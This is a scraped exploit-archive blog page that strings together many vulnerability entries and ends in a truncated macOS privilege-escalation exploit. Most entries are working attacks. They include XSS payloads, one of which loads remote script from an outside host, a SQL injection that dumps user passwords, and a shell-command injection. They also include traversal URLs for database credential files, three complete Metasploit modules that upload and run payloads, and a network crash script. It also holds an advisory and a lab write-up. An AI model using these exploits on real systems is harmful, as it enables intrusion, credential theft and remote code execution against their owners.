source: https://www.securityfocus.com/bid/47957/info
Gadu-Gadu Instant Messenger is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
file name that loads external x.js code:
<input
onfocus="eval(unescape('x%3Ddocument.getElementsByTagName%28%27head%27%29.item%280%29%3By%3Ddocument.createElement%28%27script%27%29%3By.src%3D%27http:%2f%2fasd.pl%2fx.js%27%3Bx.appendChild%28y%29%3B'));this.setAttribute('onfocus',0);"
autofocus>
example x.js code to hide, accept and open every file request:
document.getElementById('extra').innerHTML = '<style>.file,
.entrySeparator{display:none;}</style>';
n = document.getElementById('open_file');
n.setAttribute('id', '');
function ff(){
if(f = document.getElementById('open_file')) {
e = document.createEvent("HTMLEvents");
e.initEvent('click', true, true);
f.dispatchEvent(e);
f.setAttribute('id', '');
}
setTimeout('ff()', 1000);
}
ff();
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863110926
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
source: https://www.securityfocus.com/bid/47953/info
Ajax Chat is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Ajax Chat 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/ajax-chat/ajax-chat.php?chat_path=%27%3C/script%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
source: https://www.securityfocus.com/bid/47952/info
Lumension Security Lumension Device Control (formerly Sanctuary) is prone to a memory-corruption vulnerability.
An attacker can exploit this issue to cause a denial-of-service condition. Due to the nature of this issue, remote code execution is possible but has not been confirmed.
Lumension Device Control 4.4 SR6 is vulnerable; other versions may also be affected.
#!/usr/local/bin/python
import sys
from socket import *
import os
if (len(sys.argv)!=2):
print "\n--------------------------------------------------"
print "Usage: %s <target IP>" % sys.argv[0]
print "--------------------------------------------------\n"
exit(0)
host=sys.argv[1]
port=65129
packet1 = "\xec\x02\x00\x00" #length of remaining packet
packet1 += "\xc9\x00\x00\x00" #some kind of packet ID?
#packet1 += "\x18\x00\x00\x00"
packet1 += "\x61\x61\x61\x61" #crash occurs here
packet1 += "\xc8\x02\x00\x00\xd4\xf8\x27\xe3\x51\xdf\xc9\x48\x82\xc3"
packet1 += "\xdb\x73\xbf\x42\xce\x77\xec\x00\x00\x00\x00\x00\x00\x00\x01\x00"
packet1 += "\x00\x00\x0d\xd8\x91\x32\x61\xf4\x43\xa1\xe1\x8e\x27\x68\x6d\xde"
packet1 += "\xbe\x1d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x95\x00\x05\x01"
packet1 += "\x03\x00\x00\x03\x01\x10\x02\x00\x00\x00\x00\x00\x00\x00"
packet1 += "\x34\x2e\x34\x2e\x31\x34\x35\x32" #client version
packet1 += "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
packet1 += "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xd6\x5e"
packet1 += "\xe0\x81\xdb\xd8\xcb\x01\xe4\x95\x45\xe1\xdb\xd8\xcb\x01\x7c\x99"
packet1 += "\x47\xbc\xdb\xd8\xcb\x01\xd6\xbc\xb0\x34\xdc\xd8\xcb\x01\x02\x00"
packet1 += "\x00\x00\x9c\x47\x57\x00\xd4\xf8\x27\xe3\x51\xdf\xc9\x48\x82\xc3"
packet1 += "\xdb\x73\xbf\x42\xce\x77\xec\x00\x00\x00\x00\x00\x00\x00\x00\x00"
packet1 += "\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00"
packet1 += "\xc0\xa8\x00\x6b" #client IP address
packet1 += "\xff\xff\xff\x00" #client subnet mask
packet1 += "\x61\x00\x63\x00\x65\x00\x72\x00\x2d\x00\x65\x00\x38\x00"
packet1 += "\x31\x00\x37\x00\x66\x00\x61\x00\x65\x00\x30\x00\x64\x00\x38\x00" # client hostname
packet1 += "\x00" * 480
packet1 += "\x00\x00\x40\xfc\xba\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80"
packet1 += "\x85\xcc\x23\x00\x00\x00\x80\xee\x36\x00\x93\x84\xde\x84\x02\x00"
packet1 += "\x00\x00\x00\x00\x00\x00"
s = socket(AF_INET, SOCK_STREAM)
s.connect((host, port))
s.send(packet1)
print s.recv(1024)
s.close()
source: https://www.securityfocus.com/bid/47951/info
phpScheduleIt is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker can exploit these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
phpScheduleIt 1.2.12 is vulnerable; other versions may also be affected.
http://www.example.com/forgot_pwd.php/[xss]
http://www.example.com/index.php/[xss]
http://www.example.com/register.php/[xss]
http://www.example.com/roschedule.php/[xss]
http://www.example.com/popCalendar.php?scheduleid=[xss]
source: https://www.securityfocus.com/bid/47941/info
The 'com_maplocator' component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/index.php?option=com_maplocator&view=state&cid= null+AND+1=0+union+select+1,2,concat(username,0x3a,password)fl0rix,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+jos_users--
source: https://www.securityfocus.com/bid/47931/info
LimeSurvey is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
LimeSurvey 1.85+ is vulnerable; other versions may also be affected.
POST /admin/admin.php HTTP/1.1
Content-Length: 110
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif,
image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.mspowerpoint,
application/msword, application/x-shockwave-flash, */*
Referer: http://xxx.xxx.xxx.xxx/admin/admin.php
Accept-Language: es-AR
Content-Type: application/x-www-form-urlencoded
Host: xxx.xxx.xxx.xxx
Pragma: no-cache
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
user=admin&password=test&loginlang=default&action=login&refererargs="/><script
>alert(document.cookie)</script>
SEC Consult Vulnerability Lab Security Advisory < 20150113-1 >
=======================================================================
title: Privilege Escalation & XSS & Missing Authentication
product: Ansible Tower
vulnerable version: <=2.0.2
fixed version: >=2.0.5
impact: high
homepage: http://www.ansible.com/tower
found: 2014-10-15
by: Manuel Hofer
SEC Consult Vulnerability Lab
https://www.sec-consult.com
=======================================================================
Vendor description:
-------------------
"Ansible Tower is the easy-to-use UI and dashboard and REST API for Ansible.
Centralize your Ansible infrastructure from a modern UI, featuring role-based
access control, job scheduling, and graphical inventory management. Tower's
REST API and CLI make it easy to embed Tower into existing tools and processes.
Tower now includes real-time output of playbook runs, an all-new dashboard and
expanded out-of-the-box cloud support."
source: http://www.ansible.com/tower
Business recommendation:
------------------------
Attackers are able to elevate privileges and gain full control over Ansible
Tower and therefore access to sensitive data of other customers.
It is assumed that further vulnerabilities exist as only a short crash test has
been performed. Therefore it is recommended to perform a thorough security
review by security professionals.
Vulnerability overview/description:
-----------------------------------
1) Privilege Escalation
Ansible Tower provides the feature to create multiple organizations inside
one tower instance. Each organization can have an unlimited number of users
and administrators which are only allowed to perform actions in the context
of their own organization. Due to missing validation of the "is_superuser"
parameter during user creation, organization admins can create superadmin
accounts and therefore elevate their privileges to gain full control of
Ansible Tower.
2) Reflected Cross-Site Scripting
Several parts of the Ansible Tower API have been identified to be vulnerable
against reflected XSS attacks which can be used by an attacker to steal user
sessions.
3) Missing Websocket Authentication / Information Leakage
The Ansible Tower UI uses Websockets to notify clients about recent events.
This part of the application lacks authentication as well as authorization,
leading to internal data about e.g. scheduled events, being leaked to
unauthorized and/or unauthenticated users.
Proof of concept:
-----------------
1) Privilege Escalation (Org-Admin to Superadmin)
Using the following request, a user with administrative privileges limited to an
organization, can create a superadmin account with access to all organizations:
> POST /api/v1/organizations/3/users/ HTTP/1.1
> Host: $host
> Authorization: Token c3f03841403a17ed79753e057167a62144dae7df
> X-Auth-Token: Token c3f03841403a17ed79753e057167a62144dae7df
>
> {"first_name":"Org1admin_superuser","last_name":"Org1admin_superuser",
> "email":"Org1admin_superuser@local.local","organization":3,
> "username":"Org1admin_superuser","password":"Org1admin_superuser",
> "password_confirm":"Org1admin_superuser","is_superuser":"true","ldap_user":""}
2) Reflected Cross-Site Scripting
The following URL parameters have been identified to be vulnerable against
reflected cross-site scripting:
* URL: /api/v1/credentials/, Parameter: order_by
* URL: /api/v1/inventories/, Parameter: order_by
* URL: /api/v1/projects/, Parameter: order_by
* URL: /api/v1/schedules/, Parameter: next_run
* URL: /api/v1/users/3/permissions/, Parameter: order_by
It is likely that similar issues exist in other parts of the application.
3) Missing Websocket Authentication / Information Leakage
An attacker can setup a websocket connection without providing any credentials
as follows. By issuing a GET request to "https://tower:8080/socket.io/1/" the
server responds with the following string:
> 43167469538:60:60:websocket,xhr-multipart,htmlfilonp-polling[...]
The first integer value can further be used to establish a websocket connection:
#~% openssl s_client -verify 0 -connect tower:8080
> GET /socket.io/1/websocket/43167469538 HTTP/1.1
> Host: tower:8080
> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
> Accept-Language: en-US,en;q=0.5
> Accept-Encoding: gzip, deflate
> Sec-WebSocket-Version: 13
> Origin: https://tower
> Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==
> Connection: keep-alive, Upgrade
> Pragma: no-cache
> Cache-Control: no-cache
> Upgrade: websocket
>
>
The websocket key seen above, has been taken from the examples of the wikipedia
page on WebSockets (http://de.wikipedia.org/wiki/WebSocket) as it is only used
to verify that the server received and understood the message.
The server responds as follows:
< HTTP/1.1 101 Switching Protocols
< Upgrade: websocket
< Connection: Upgrade
< Sec-WebSocket-Accept: s3pPLMBiTxaQ9kYGzzhZRbK+xOo=
Now that the websocket connection has been established, data that would
otherwise be presented to logged in users to display status updates for "job
related events" inside tower, can now be observed without any authentication.
Following an example of data received through the websocket connection.
> 5::/socket.io/jobs:{"args":{"status":"pending","project_id":56,
> "unified_job_id":61,"event":"status_changed","endpoint":"/socket.io/jobs"},
> "name":"status_changed"}
Even tough no critical information has been identified leaking through the
websocket, this should still be protected with proper authentication and
authorization because it might aid an attacker in conducting further attacks.
Vulnerable / tested versions:
-----------------------------
Ansible Tower version v2.0.2 has been tested which was the most recent version
at the time of discovery.
Vendor contact timeline:
------------------------
2014-10-22: Contacting vendor through security@ansible.com and asking for
cryptographic material in order to securely send advisory.
2014-10-22: Sending unencrypted advisory as requested by vendor.
2014-10-22: Vendor suggests to release a fix prior to 12.12.2014
2014-10-28: Vendor confirms reported vulnerabilities
2014-12-10: Vendor releases fixed Version 2.0.5
2015-01-13: SEC Consult releases security advisory
Solution:
---------
Upgrade to a fixed version of Ansible Tower >= 2.0.5
Workaround:
-----------
For vulnerabilities 1 to 2, no workaround can be applied.
3 can be circumvented by blocking access to TCP port 8080 on your
Ansible Tower installation.
Advisory URL:
-------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius - Zurich
Headquarter:
Mooslackengasse 17, 1190 Vienna, Austria
Phone: +43 1 8903043 0
Fax: +43 1 8903043 15
Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult
Interested to work with the experts of SEC Consult?
Write to career@sec-consult.com
EOF Manuel Hofer / 2015
source: https://www.securityfocus.com/bid/47924/info
klibc is prone to a shell-command-execution vulnerability because the application fails to properly sanitize user-supplied input.
An attacker can exploit this issue to execute arbitrary shell commands in the context of the application that uses the vulnerable library.
Versions prior to klibc 1.5.22 are vulnerable.
DNSDOMAIN="\\\"\$(echo owned; touch /tmp/owned)"
source: https://www.securityfocus.com/bid/47918/info
Andy's PHP Knowledgebase is prone to a vulnerability that lets remote attackers execute arbitrary code because the application fails to sanitize user-supplied input.
Attackers can exploit this issue to execute arbitrary PHP code within the context of the affected webserver process.
Andy's PHP Knowledgebase 0.95.4 is vulnerable; other versions may also be affected.
<html>
<body onload="document.forms[0].submit()">
<form method="POST" action="http://localhost/aphpkb/install/step5.php">
<input type="hidden" name="install_dbuser" value="');system('calc');//" />
<input type="submit" name="submit" />
</form>
</body>
</html>
source: https://www.securityfocus.com/bid/47919/info
Zend Framework is prone to a security-bypass vulnerability.
An attacker can leverage this vulnerability to bypass certain security restrictions. Successful exploits may allow attackers to exploit SQL-injection vulnerabilities.
Zend Framework versions prior to 1.10.9 and 1.11.6 are vulnerable.
$dsn = 'mysql:dbname=INFORMATION_SCHEMA;host=127.0.0.1;charset=GBK';
$pdo = new PDO($dsn, $user, $pass);
$pdo->exec('SET NAMES GBK');
$string = chr(0xbf) . chr(0x27) . ' OR 1 = 1; /*';
$sql = "SELECT TABLE_NAME
FROM INFORMATION_SCHEMA.TABLES
WHERE TABLE_NAME LIKE ".$pdo->quote($string).";";
$stmt = $pdo->query($sql);
var_dump($stmt->rowCount());
source: https://www.securityfocus.com/bid/47914/info
Room Juice is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Room Juice 0.3.3 is vulnerable; other versions may also be affected.
http://www.example.com/roomjuice-0.3.3/display.php?filename=%3Cscript%3Ealert%280%29%3C/script%3E
source: https://www.securityfocus.com/bid/47905/info
CiscoWorks Common Services is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input.
A remote attacker could exploit this vulnerability using directory-traversal strings (such as '../') to gain access to arbitrary files on the targeted system. This may result in the disclosure of sensitive information or lead to a complete compromise of the affected computer.
This issue is being monitored by Cisco Bug ID CSCto35577.
CiscoWorks Common Services 3.3 and prior are vulnerable.
http://www.example.com/cwhp/auditLog.do?file=..\..\..\..\..\..\..\boot.ini
cmfDBA user database info:
http://www.example.com/cwhp/auditLog.do?file=..\..\..\..\..\..\..\Program
Files\CSCOpx\MDC\Tomcat\webapps\triveni\WEB-INF\classes\schedule.properties DB connection info for all databases:
http://www.example.com/cwhp/auditLog.do?file=..\..\..\..\..\..\..\Program
Files\CSCOpx\lib\classpath\com\cisco\nm\cmf\dbservice2\DBServer.properties
Note: When reading large files such as this file, ensure the row limit is adjusted to 500 for example.
DB password change log:
http://www.example.com/cwhp/auditLog.do?file=..\..\..\..\..\..\..\Program
Files\CSCOpx\log\dbpwdChange.log
En este post vamos a estar resolviendo el laboratorio de PortSwigger: “Web shell upload via Content-Type restriction bypass”.
Para resolver el laboratorio tenemos que subir un archivo PHP que lea y nos muestre el contenido del archivo /home/carlos/secret. Ya que para demostrar que hemos completado el laboratorio, deberemos introducir el contenido de este archivo.
Además, el servidor está configurado para prevenir la subida de archivos según el Content-Type. Por lo que tendremos que bypasear esta defensa.
En este caso, el propio laboratorio nos proporciona una cuenta para iniciar sesión, por lo que vamos a hacerlo:
Una vez hemos iniciado sesión, nos encontramos con el perfil de la cuenta:
Como podemos ver, tenemos una opción para subir archivo, y concretamente parece ser que se trata de actualizar el avatar del perfil. Vamos a intentar aprovecharnos de esta opción para subir el siguiente archivo PHP:
Antes que nada, vamos a preparar Burp Suite para que intercepte la petición:
Una vez tenemos Burp Suite listo junto al proxy, seleccionamos el archivo y le damos a “Upload”:
Aquí Burp Suite interceptará la petición de subida del archivo:
Vamos a mandar la petición al repeater para tratar con ella mejor, para ello, pulsamos Ctrl R.
Una vez en el repeater, cuando le damos a “Send”, podemos ver la respuesta a la subida del archivo por parte del servidor:
En este caso, indica que los archivos cuya cabecera Content-Type sea application/x-php no están permitidos. Y que solo están permitidos los que sea image/jpeg o image/png.
Sabiendo el tipo de restricción que nos está implantando el servidor, simplemente podemos cambiar el Content-Type de nuestra petición:
Con esto, el contenido del archivo no cambia, y tampoco afectará a que se interprete. Con este cambio, volvemos a intentar la subida del archivo:
Esta vez vemos que se ha subido correctamente. Podemos ver esta respuesta en el navegador de la siguiente forma:
Una vez llegados aquí, ya podemos desactivar el Burp Suite, ya que no haremos más uso de él.
Con esto, volvemos a nuestro perfil.
Ahora, si nos fijamos en el perfil, podemos ver como el avatar ha cambiado, y ahora muestra un fallo de que no carga bien la imagen:
Dándole click derecho, podemos irnos a la ruta directa de la imagen para ver si se trata de nuestro archivo PHP:
Efectivamente, el archivo PHP que hemos subido se ha almacenado como el archivo del avatar, por eso no cargaba en el perfil, intentaba cargar una imagen cuando no lo era. Al visitar el archivo PHP, se ha interpretado el código que hemos colocado, y conseguimos leer el archivo secret.
Habiendo leído este archivo, ya simplemente entregamos la respuesta:
Y de esta forma, completamos el laboratorio:
source: https://www.securityfocus.com/bid/47903/info
Cisco Unified Operations Manager is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
This issue is being tracked by Cisco Bug ID CSCto12712.
Cisco Unified Operations Manager versions prior to 8.6 are vulnerable.
http://www.example.com/CSCOnm/servlet/com.cisco.nm.help.ServerHelpEngine?tag=Portal_introductionhomepage61a8b"%3balert(1)
source: https://www.securityfocus.com/bid/47902/info
CiscoWorks Common Services is prone to a cross-site scripting vulnerability because the application fails to sufficiently sanitize user-supplied input.
Exploiting this vulnerability could allow an attacker to perform cross-site scripting attacks on unsuspecting users in the context of the affected website. As a result, the attacker may be able to steal cookie-based authentication credentials and launch other attacks.
This issue is being monitored by Cisco Bug ID CSCto12704.
CiscoWorks Common Services 3.3 and prior are vulnerable.
http://www.example.com/cwhp/device.center.do?device=&72a9f"><script>alert(1)</script>5f5251aaad=1
##
# This module requires Metasploit: http://www.metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::FileDropper
include Msf::HTTP::Wordpress
def initialize(info = {})
super(update_info(
info,
'Name' => 'WordPress WP Symposium 14.11 Shell Upload',
'Description' => %q{WP Symposium Plugin for WordPress contains a
flaw that allows a remote attacker to execute
arbitrary PHP code. This flaw exists because the
/wp-symposium/server/file_upload_form.php script
does not properly verify or sanitize
user-uploaded files. By uploading a .php file,
the remote system will place the file in a
user-accessible path. Making a direct request to
the uploaded file will allow the attacker to
execute the script with the privileges of the
web server.},
'License' => MSF_LICENSE,
'Author' =>
[
'Claudio Viviani', # Vulnerability disclosure
'Rob Carr <rob[at]rastating.com>' # Metasploit module
],
'References' =>
[
['OSVDB', '116046'],
['WPVDB', '7716']
],
'DisclosureDate' => 'Dec 11 2014',
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' => [['wp-symposium < 14.12', {}]],
'DefaultTarget' => 0
))
end
def check
check_plugin_version_from_readme('wp-symposium', '14.12')
end
def generate_mime_message(payload, payload_name, directory_name, symposium_url)
data = Rex::MIME::Message.new
data.add_part('1', nil, nil, 'form-data; name="uploader_uid"')
data.add_part("./#{directory_name}/", nil, nil, 'form-data; name="uploader_dir"')
data.add_part(symposium_url, nil, nil, 'form-data; name="uploader_url"')
data.add_part(payload.encoded, 'application/x-php', nil, "form-data; name=\"files[]\"; filename=\"#{payload_name}\"")
data
end
def exploit
print_status("#{peer} - Preparing payload")
unique_name = Rex::Text.rand_text_alpha(10)
payload_name = "#{unique_name}.php"
symposium_url = normalize_uri(wordpress_url_plugins, 'wp-symposium', 'server', 'php')
payload_url = normalize_uri(symposium_url, unique_name, payload_name)
data = generate_mime_message(payload, payload_name, unique_name, symposium_url)
symposium_url = normalize_uri(symposium_url, 'index.php')
print_status("#{peer} - Uploading payload to #{payload_url}")
res = send_request_cgi(
'method' => 'POST',
'uri' => symposium_url,
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => data.to_s
)
if res && res.code == 200 && res.body.length > 0 && !res.body.include?('error') && res.body != '0'
print_good("#{peer} - Uploaded the payload")
register_files_for_cleanup(payload_name)
print_status("#{peer} - Executing the payload...")
send_request_cgi(
{
'uri' => payload_url,
'method' => 'GET'
}, 5)
print_good("#{peer} - Executed payload")
else
if res.nil?
fail_with(Failure::Unreachable, "No response from the target")
else
vprint_error("#{peer} - HTTP Status: #{res.code}")
vprint_error("#{peer} - Server returned: #{res.body}")
fail_with(Failure::UnexpectedReply, "Failed to upload the payload")
end
end
end
end
##
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::MYSQL
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Oracle MySQL for Microsoft Windows FILE Privilege Abuse',
'Description' => %q{
This module takes advantage of a file privilege misconfiguration problem
specifically against Windows MySQL servers. This module abuses the FILE
privilege to write a payload to Microsoft's All Users Start Up directory
which will execute every time a user logs in. The default All Users Start
Up directory used by the module is Windows 7 friendly.
},
'Author' =>
[
'sinn3r',
'Sean Verity <veritysr1980[at]gmail.com'
],
'DefaultOptions' =>
{
'DisablePayloadHandler' => 'true'
},
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2012-5613'], #DISPUTED
['OSVDB', '88118'],
['EDB', '23083'],
['URL', 'http://seclists.org/fulldisclosure/2012/Dec/13']
],
'Platform' => 'win',
'Targets' =>
[
[ 'MySQL on Windows', { } ]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Dec 01 2012'
))
register_options(
[
OptString.new('USERNAME', [ true, 'The username to authenticate as']),
OptString.new('PASSWORD', [ true, 'The password to authenticate with']),
OptString.new('STARTUP_FOLDER', [ true, 'The All Users Start Up folder', '/programdata/microsoft/windows/start menu/programs/startup/'])
])
end
def check
m = mysql_login(datastore['USERNAME'], datastore['PASSWORD'])
return Exploit::CheckCode::Safe unless m
return Exploit::CheckCode::Appears if is_windows?
Exploit::CheckCode::Safe
end
def peer
"#{rhost}:#{rport}"
end
def query(q)
rows = []
begin
res = mysql_query(q)
return rows unless res
res.each_hash do |row|
rows << row
end
rescue RbMysql::ParseError
return rows
end
rows
end
def is_windows?
r = query("SELECT @@version_compile_os;")
r[0]['@@version_compile_os'] =~ /^Win/ ? true : false
end
def get_drive_letter
r = query("SELECT @@tmpdir;")
drive = r[0]['@@tmpdir'].scan(/^(\w):/).flatten[0] || ''
drive
end
def upload_file(bin, dest)
p = bin.unpack("H*")[0]
query("SELECT 0x#{p} into DUMPFILE '#{dest}'")
end
def exploit
unless datastore['STARTUP_FOLDER'].start_with?('/') && datastore['STARTUP_FOLDER'].end_with?('/')
fail_with(Failure::BadConfig, "STARTUP_FOLDER should start and end with '/' Ex: /programdata/microsoft/windows/start menu/programs/startup/")
end
print_status("#{peer} - Attempting to login as '#{datastore['USERNAME']}:#{datastore['PASSWORD']}'")
begin
m = mysql_login(datastore['USERNAME'], datastore['PASSWORD'])
rescue RbMysql::AccessDeniedError
fail_with(Failure::NoAccess, "#{peer} - Access denied")
end
fail_with(Failure::NoAccess, "#{peer} - Unable to Login") unless m
unless is_windows?
fail_with(Failure::NoTarget, "#{peer} - Remote host isn't Windows")
end
begin
drive = get_drive_letter
rescue RbMysql::ParseError
fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine drive name")
end
fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine drive name") unless drive
exe_name = Rex::Text::rand_text_alpha(5) + ".exe"
dest = "#{drive}:#{datastore['STARTUP_FOLDER']}#{exe_name}"
exe = generate_payload_exe
print_status("#{peer} - Uploading to '#{dest}'")
begin
upload_file(exe, dest)
rescue RbMysql::AccessDeniedError
fail_with(Failure::NotVulnerable, "#{peer} - No permission to write. I blame kc :-)")
end
register_file_for_cleanup("#{dest}")
end
end
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::FileDropper
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Lexmark MarkVision Enterprise Arbitrary File Upload',
'Description' => %q{
This module exploits a code execution flaw in Lexmark MarkVision Enterprise before 2.1.
A directory traversal in the GfdFileUploadServlet servlet allows an unauthenticated
attacker to upload arbitrary files, including arbitrary JSP code. This module has been
tested successfully on Lexmark MarkVision Enterprise 2.0 with Windows 2003 SP2.
},
'Author' =>
[
'Andrea Micalizzi', # Vulnerability Discovery
'juan vazquez' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2014-8741'],
['ZDI', '14-410'],
['URL', 'http://support.lexmark.com/index?page=content&id=TE666&locale=EN&userlocale=EN_US']
],
'Privileged' => true,
'Platform' => 'win',
'Arch' => ARCH_JAVA,
'Targets' =>
[
[ 'Lexmark Markvision Enterprise 2.0', { } ]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Dec 09 2014'))
register_options(
[
Opt::RPORT(9788),
OptString.new('TARGETURI', [true, 'ROOT path', '/'])
], self.class)
end
def check
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path.to_s, 'mve', 'help', 'en', 'inventory', 'am_about.html')
})
version = nil
if res && res.code == 200 && res.body && res.body.to_s =~ /MarkVision Enterprise ([\d\.]+)/
version = $1
else
return Exploit::CheckCode::Unknown
end
if Gem::Version.new(version) <= Gem::Version.new('2.0.0')
return Exploit::CheckCode::Appears
end
Exploit::CheckCode::Safe
end
def exploit
jsp_leak = jsp_path
jsp_name_leak = "#{rand_text_alphanumeric(4 + rand(32 - 4))}.jsp"
# By default files uploaded to C:\Program Files\Lexmark\Markvision Enterprise\apps\library\gfd-scheduled
# Default app folder on C:\Program Files\Lexmark\Markvision Enterprise\tomcat\webappps\ROOT
traversal_leak = "/..\\..\\..\\tomcat\\webapps\\ROOT\\#{jsp_name_leak}\x00.pdf"
print_status("#{peer} - Uploading info leak JSP #{jsp_name_leak}...")
if upload_file(traversal_leak, jsp_leak)
print_good("#{peer} - JSP successfully uploaded")
else
fail_with(Failure::Unknown, "#{peer} - JSP upload failed")
end
res = execute(jsp_name_leak)
if res && res.code == 200 && res.body.to_s !~ /null/ && res.body.to_s =~ /Path:(.*)/
upload_path = $1
print_good("#{peer} - Working directory found in #{upload_path}")
register_file_for_cleanup(::File.join(upload_path, 'webapps', 'ROOT', jsp_name_leak))
else
print_error("#{peer} - Couldn't retrieve the upload directory, manual cleanup will be required")
end
jsp_payload_name = "#{rand_text_alphanumeric(4+rand(32-4))}.jsp"
jsp_payload = payload.encoded
traversal_payload = "/..\\..\\..\\tomcat\\webapps\\ROOT\\#{jsp_payload_name}\x00.pdf"
print_status("#{peer} - Uploading JSP payload #{jsp_payload_name}...")
if upload_file(traversal_payload, jsp_payload)
print_good("#{peer} - JSP successfully uploaded")
register_file_for_cleanup(::File.join(upload_path, 'webapps', 'ROOT', jsp_payload_name)) if upload_path
else
fail_with(Failure::Unknown, "#{peer} - JSP upload failed")
end
print_status("#{peer} - Executing payload...")
execute(jsp_payload_name, 3)
end
def upload_file(filename, contents)
good_signature = rand_text_alpha(4 + rand(4))
bad_signature = rand_text_alpha(4 + rand(4))
post_data = Rex::MIME::Message.new
post_data.add_part(good_signature, nil, nil, 'form-data; name="success"')
post_data.add_part(bad_signature, nil, nil, 'form-data; name="failure"')
post_data.add_part(contents, 'application/octet-stream', nil, "form-data; name=\"datafile\"; filename=\"#{filename}\"")
res = send_request_cgi(
{
'uri' => normalize_uri(target_uri.path, 'mve', 'upload', 'gfd'),
'method' => 'POST',
'data' => post_data.to_s,
'ctype' => "multipart/form-data; boundary=#{post_data.bound}"
})
if res && res.code == 200 && res.body && res.body.to_s.include?(good_signature)
return true
else
return false
end
end
def execute(jsp_name, time_out = 20)
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path.to_s, jsp_name),
'method' => 'GET'
}, time_out)
res
end
def jsp_path
jsp =<<-EOS
<%@ page language="Java" import="java.util.*"%>
<%
out.println("Path:" + System.getProperty("catalina.home"));
%>
EOS
jsp
end
end
/*
* lpe-issue1.c
* Written for Mac OS X Yosemite (10.10.1) by @joystick and @rpaleari.
*
* Exploits IOBluetoothHCIUserClient::DispatchHCIWriteStoredLinkKey()
*
* gcc -Wall -o lpe-issue1{,.c} -framework IOKit
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <mach/mach.h>
#include <mach/vm_map.h>
#include <IOKit/IOKitLib.h>
#define SIZE 0x1000
struct BluetoothCall {
uint64_t args[7];
uint64_t sizes[7];
uint64_t index;
};
#ifndef bswap64
# define bswap64(num) \
( (((uint64_t)(num) << 56) ) \
| (((uint64_t)(num) << 40) & UINT64_C(0x00FF000000000000)) \
| (((uint64_t)(num) << 24) & UINT64_C(0x0000FF0000000000)) \
